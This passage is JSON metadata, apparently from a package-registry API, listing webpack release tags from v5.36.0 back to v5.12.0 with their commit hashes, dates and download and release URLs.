tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2F